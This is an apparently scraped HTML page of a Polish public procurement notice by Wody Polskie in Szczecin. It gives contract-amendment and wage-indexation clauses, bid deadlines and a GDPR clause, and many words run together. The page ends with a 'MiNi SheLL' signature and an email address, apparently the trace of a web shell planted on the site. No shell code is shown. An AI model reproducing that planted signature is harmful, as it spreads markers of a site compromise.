wytycznych dotyczących realizacji projektu. 3. Jeżeli Wykonawca uważa się zauprawnionego do wnioskowania o zmianę terminu wykonania Przedmiotu Umowy na podstawie ust. 2pkt 1 Umowy lub zmiany umowy w zakresie Materiałów, parametrów technicznych, technologiiwykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy na podstawie ust. 2 pkt2 Umowy lub zmiany umowy na innej podstawie, zobowiązany jest do przekazania Zamawiającemuwniosku dotyczącego zmiany umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawędo żądania takiej zmiany. 4. Wniosek, o którym mowa w ust. 3. powinien zostać przekazanyniezwłocznie, jednakże nie później niż w terminie 7 dni roboczych od dnia, w którym Wykonawcadowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach. 5. Wykonawcazobowiązany jest do dostarczenia wraz z wnioskiem, o którym mowa w ust. 3, wszelkich innychdokumentów wymaganych Umową, w tym informacji uzasadniających żądanie zmiany umowy,stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany. 6. Wykonawcazobowiązany jest do sporządzania bieżącej dokumentacji koniecznej dla uzasadnienia żądania zmiany iprzechowywania jej na Terenie budowy lub w innym miejscu wskazanym przez Inspektora nadzoruinwestorskiego. 7. Po otrzymaniu wniosku, o którym mowa w ust. 3 Inspektor nadzoru inwestorskiegojest uprawniony, bez dokonywania oceny jego zasadności, do kontroli dokumentacji, o której mowa wust. 6 i wydania Wykonawcy polecenia prowadzenia dalszej dokumentacji bieżącej uzasadniającejżądanie zmiany. 8. Wykonawca jest zobowiązany do okazania do wglądu Inspektorowi nadzoruinwestorskiego dokumentacji, o której mowa w ust. 6 i przedłożenia na żądanie Inspektora nadzoruinwestorskiego jej kopii. 9. W terminie 7 dni roboczych od dnia otrzymania wniosku, o którym mowa wust. 3 i informacji uzasadniających żądanie zmiany umowy, Inspektor nadzoru inwestorskiegozobowiązany jest do pisemnego ustosunkowania się do zgłoszonego żądania zmiany umowy iprzekazania go Zamawiającemu wraz z uzasadnieniem, zarówno w przypadku odmowy, jak i akceptacjiżądania zmiany. 10. W terminie 7 dni roboczych od dnia otrzymania żądania zmiany, zaopiniowanegoprzez Inspektora nadzoru inwestorskiego, Zamawiający powiadomi Wykonawcę o akceptacji żądaniazmiany umowy i terminie podpisania aneksu do umowy lub odpowiednio o braku akceptacji zmiany. 11.Wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego iWykonawcy w formie pisemnej w drodze aneksu umowy, pod rygorem nieważności. 12. Stronydopuszczaj zmianę wysokości wynagrodzenia Wykonawcy , w przypadku zmiany: 1) Stawki podatku odtowarów i usług, 2) Wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawkigodzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnymwynagrodzeniu za pracę, 3) Zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniuzdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne - jeżeli zmiany tebędą miały wpływ na koszty wykonania zamówienia przez wykonawcę. 13. Zmiana wysokościwynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 12,będzie odnosić się wyłącznie do części przedmiotu Umowy zrealizowanej, zgodnie z terminamiustalonymi Umową, po dniu wejścia w życie zmiany przepisów , o których mowa w ust. 12. 14. Wprzypadku zmiany, o której mowa w ust. 12 pkt 1, wartość wynagrodzenia netto nie zmieni się, a wartośćwynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów. 15. Zmiana wysokościwynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w ust. 12 pkt 2 i 3 będzie obejmowaćwyłącznie część wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmianawysokości kosztów wykonania Umowy przez Wykonawcę w związku z wejściem w życie przepisówodpowiednio zmieniających wysokość minimalnego wynagrodzenia za pracę lub dokonujących zmian wzakresie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresiewysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. 16. W przypadku zmiany, o którejmowa w ust. 12 pkt 2 i 3, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą wzrostowikosztu Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń Pracowników wykonującychpracę do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę, z uwzględnieniemwszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. Kwotaodpowiadająca wzrostowi kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzeniaPracowników wykonujących pracę o których mowa w zdaniu poprzedzającym, odpowiadającejzakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu Umowy. 17. Wcelu zawarcia aneksu, o którym mowa w ust. 1, każda ze Stron może wystąpić do drugiej Strony zwnioskiem o dokonanie zmiany wysokości wynagrodzenia należnego Wykonawcy, wraz z uzasadnieniemzawierającym w szczególności szczegółowe wyliczenie całkowitej kwoty, o jaką wynagrodzenieWykonawcy powinno ulec zmianie, oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmianawysokości kosztów wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia należnegoWykonawcy. 18. W przypadku konieczności wykonania robót dodatkowych, wynikających z czynnikówzewnętrznych, których nie można było przewidzieć w chwili zawarcia Umowy, w tym koniecznośćuwzględnienia wpływu innych przedsięwzięć i działań powiązanych z przedmiotem niniejszej Umowy. Wtym przypadku wynagrodzenie za roboty dodatkowe zostanie ustalone na podstawie opracowanej przezWykonawcę wyceny ww. robót w formie kosztorysu sporządzonego metodą szczegółową zwykorzystaniem formuły ceny jednostkowej, przy zastosowaniu cen jednostkowych lub ich składowychzawartych w kosztorysie będącym podstawą wykonywania robót podstawowych a w przypadku brakutakich cen opracowany będzie przy zastosowaniu następujących nośników cenotwórczych wskazanych wdostępnych publikacjach na rynku np. Sekocenbud (wybór publikacji przez Wykonawcę podlegazatwierdzeniu przez Zamawiającego), za ostatni kwartał przed dniem sporządzenia kosztorysu: a) stawkaroboczogodziny „R" - średnia dla robót inżynieryjnych dla województwa zachodniopomorskiego, b)koszty pośrednie „Kp" (R+S) - średnie dla robót inżynieryjnych, c) zysk kalkulacyjny „Z" (R+S+Kp) -średnie dla robót inżynieryjnych, d) ceny jednostkowe sprzętu (S) i materiałów (M) - łącznie z kosztamizakupu - będą przyjmowane na podstawie średnich cen wynikających z ogólnie dostępnych cenników, wtym również cen dostawców na stronach internetowych, a w przypadku braku możliwości ustalenia cenyw oparciu o powyższe źródła - według ofert handlowych, itp, e) nakłady rzeczowe - w oparciu opowszechnie stosowane katalogi nakładów rzeczowych, w przypadku robót dla których brak nakładów wkatalogach nakładów rzeczowych, będzie zastosowana wycena indywidualna Wykonawcy, zatwierdzonaprzez Zamawiającego. 19.. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowynastępujące zmiany: a. danych związanych z obsługą administracyjno-organizacyjną umowy, b. danychteleadresowych, c. danych rejestrowych. Wzór umowy stanowi załącznik nr 8 do SIWZ. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-07-17</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1.Zamawiającym jest: Państwowe Gospodarstwo Wodne Wody Polskie Regionalny Zarząd GospodarkiWodnej w Szczecinie ul. Tama Pomorzańska 13A, 70-030 Szczecin 2.Postępowanie prowadzi WydziałZamówień Publicznych. 3. Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. wsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a)administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie zsiedzibą w Warszawie przy ul. Grzybowskiej 80/82, 00-844 Warszawa REGON: 368302575, NIP: 527-282-56-16 b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail:iod@wody.gov.pl c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO wcelu związanym z postępowaniem o udzielenie zamówienia publicznego oznaczonego numerempostępowania SZ.ROZ.2810.28.2020 prowadzonym na podstawie Pzp; d) odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp; e) Pani/Pana dane osobowe będą przechowywane, zgodniez art. 97 ust. 1 ustawy Pzp, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończonopostępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okresprzechowywania obejmuje cały czas trwania umowy; f) obowiązek podania przez Panią/Pana danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisachustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencjeniepodania określonych danych wynikają z ustawy Pzp; g) w odniesieniu do Pani/Pana danychosobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO h)posiada Pani/Pan: 􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Panadotyczących; 􀀀 na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danychosobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wynikupostępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresieniezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); 􀀀 napodstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowychz zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczeniaprzetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu ochrony praw innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwaczłonkowskiego); 􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdyuznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO i)nie przysługuje Państwu: 􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danychosobowych; 􀀀 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; 􀀀 napodstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawąprawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. 5.Wykonawca możeprzedłożyć faktury elektroniczne za pomocą systemu zgodnie z ustawą z dnia 9 listopada 2018 r. oelektronicznym fakturowaniu w zamówieniach publicznych, koncesjach na roboty budowlane lub usługioraz partnerstwie publiczno-prywatnym (Dz. U. z 2019 r. poz. 2191). 6. W przypadku rozbieżności pomiędzy informacjami przekazanymi na Platformie a treścią dokumentów stanowiących ofertę decydująca jest treść dokumentów załączonych do oferty.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com